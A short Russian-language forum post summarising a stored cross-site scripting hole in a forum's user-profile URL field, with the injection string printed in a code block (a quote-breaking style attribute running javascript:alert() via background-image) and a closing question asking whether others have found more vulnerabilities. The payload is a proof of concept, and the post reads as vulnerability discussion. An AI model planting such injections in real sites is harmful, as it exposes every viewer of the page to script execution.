и так подведем итоги:

Если в информации пользователя вместо урл странички указать
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> " style=`background-image:url('javascript:alert()');visibility:hidden" [/QUOTE]<span id='postcolor'>
То этот скрипт сработает у всякого кто просмотрит вашу инфу.
=======================================
Так что еще, может кто нибуть нашел еще уязвимости?